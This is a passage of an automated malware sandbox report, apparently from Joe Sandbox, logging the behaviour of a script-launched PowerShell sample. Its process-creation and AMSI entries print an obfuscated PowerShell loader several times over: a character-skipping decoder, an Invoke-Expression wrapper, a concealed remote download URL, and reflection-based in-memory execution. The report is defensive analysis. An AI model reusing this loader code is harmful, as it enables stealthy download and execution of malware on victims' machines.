              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: Binary string: findstr.pdbGCTL source: msiexec.exe, 0000000D.00000003.2202873633.0000000003F9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2304963221.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2577331213.000000000554C000.00000004.80000000.00040000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.000000000088D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574674617.000000000344C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2533613166.00000000306BC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: poqexec.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2173806414.0000000000D14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: poqexec.pdbGCTL source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2173806414.0000000000D14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2577331213.000000000554C000.00000004.80000000.00040000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.000000000088D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574674617.000000000344C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2533613166.00000000306BC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000009.00000002.1952432102.0000000008520000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E763D2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: findstr.pdb source: msiexec.exe, 0000000D.00000003.2202873633.0000000003F9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2304963221.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000D.00000003.2129060587.000000001F6E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FA50000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2131397423.000000001F89B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FBEE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2235634912.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2233811191.000000000098A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000D.00000003.2129060587.000000001F6E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FA50000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2131397423.000000001F89B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FBEE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000010.00000002.2574280134.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2235634912.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2233811191.000000000098A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: b.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E7642B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E7642B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb_s#t source: powershell.exe, 00000009.00000002.1952432102.0000000008520000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2573228695.0000000000BDF000.00000002.00000001.01000000.00000008.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$To", "0")
              Source: Yara matchFile source: 00000009.00000002.1953854490.0000000008FE9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1953728487.0000000008870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1933714178.00000000058D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Orthographer)$gLOBaL:stAaLvalSevrkErNeS = [SYStEM.TEXt.eNcODInG]::ascII.geTStRing($gteMagEn85)$glOBAL:mAnglenDe=$STaALvALSEVRKeRnes.subStRING($cUddY,$FOdLAnGe)<#Rbet driftsbidrags Ex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Omvltningens $Diatomlhernes $Skovlenes), (Weighable179 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anemopathy = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Teleocephalous)), $Rejsnings).DefineDynamicModule($untantalizing, $false).DefineType($Ballsiest, $Coman112, [System.MulticastDelegate]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Orthographer)$gLOBaL:stAaLvalSevrkErNeS = [SYStEM.TEXt.eNcODInG]::ascII.geTStRing($gteMagEn85)$glOBAL:mAnglenDe=$STaALvALSEVRKeRnes.subStRING($cUddY,$FOdLAnGe)<#Rbet driftsbidrags Ex
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZooJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7C8175205 push eax; ret 4_2_00007FF7C8175251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7C82479FE push ds; ret 4_2_00007FF7C82479FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047D42D7 push ebx; ret 9_2_047D42DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047DD4DE pushad ; ret 9_2_047DD4E1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047DD78C pushfd ; ret 9_2_047DD78D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_075ACF5C push eax; iretd 9_2_075ACF5D
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E240ED push es; ret 14_2_00E240F2
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E0A85F push es; ret 14_2_00E0A87B
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E0A801 push es; ret 14_2_00E0A87B
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1B018 push es; retf 14_2_00E1B02F
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1E9A3 push esp; ret 14_2_00E1E9AE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E17163 push edx; ret 14_2_00E1716A
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1A250 push ebx; ret 14_2_00E1A253
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E203F4 push 1A3171CFh; ret 14_2_00E203F9
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1CCE6 push ebx; retf 14_2_00E1CCE7
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1B5C3 push edi; ret 14_2_00E1B5C4
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1162A push 0000000Ah; retf 14_2_00E1162D
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1FFE6 push esp; retf 14_2_00E1FFE7
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1BF4D pushfd ; retf 14_2_00E1BF64
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1E75B push esp; retf 14_2_00E1E773
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1E75E push esp; retf 14_2_00E1E773
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1D715 push edx; retf 14_2_00E1D71C
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_048154AD pushfd ; retf 14_2_048154C4
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04817CBB push esp; retf 14_2_04817CD3
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04817CBE push esp; retf 14_2_04817CD3
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04816C75 push edx; retf 14_2_04816C7C
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04803DBF push es; ret 14_2_04803DDB
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04819546 push esp; retf 14_2_04819547
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04803D61 push es; ret 14_2_04803DDB
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_04814578 push es; retf 14_2_0481458F
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_048106C3 push edx; ret 14_2_048106CA
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
